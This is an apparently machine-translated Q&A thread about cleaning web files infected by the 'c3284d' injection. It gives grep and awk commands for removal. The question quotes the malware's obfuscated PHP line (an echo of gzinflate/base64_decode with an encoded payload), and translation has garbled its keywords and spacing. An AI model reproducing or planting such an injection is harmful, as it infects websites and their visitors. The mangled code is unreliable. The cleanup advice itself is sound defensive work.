清理感染 c3284d 病毒的服务器，使用搜索和替换

Question

我遇到了 Notorious c3284d 病毒的问题。它修改了几乎所有可以找到的 html/php/js 文件。

我已经更改了服务器上的所有密码和用户，所以如果它是一个被盗用的帐户，它应该已经解决了这个问题，但我仍然在努力彻底删除它。

我能够使用一个简单的sudo grep -R "#c3284d#" /home 命令找到所有受感染的文件。

但我需要一种快速的方法来搜索并替换它。

病毒签名是这一行：

"#c3284d#" 回波（gzinflate（BASE64_DECODE（ “VVHBboMwDL1X6j / kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS + nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns / 48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B / ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2 + / EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS / 7parGmkfU + y1b5D / HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18 + XyLoNfNISRsBa1fG1UKwN + HIeK + Pqabw ==”）））; "#/c3284d#"

当回声线可以改变和变化，但它总是以#c32..#开始并以#/c3....#结束。

我只想用什么来代替它。

Answer 1

查找所有受影响文件的简单方法：

grep -H -r "c3284d" /home/user

此恶意软件代码来自受感染的客户端，该客户端具有以明文形式存储的 FTP 密码。该恶意软件能够抓取 FTP 登录信息，然后自动开始将广告代码注入文件。绝对应该是一个完整的审计——但如果你很幸运并且及时发现了它，它很可能不是来自服务器本身。

Answer 2

awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#\/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#\/c3284d#") == 0) { print $0 } }' dirty-file > clean-file

这很拗口，但确实有效：

$ cat <<'EOF' | awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#\/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#\/c3284d#") == 0) { print $0 } }'
> foo
> #c3284d#
> bar
> baz
> #/c3284d#
> quux
> EOF
foo
quux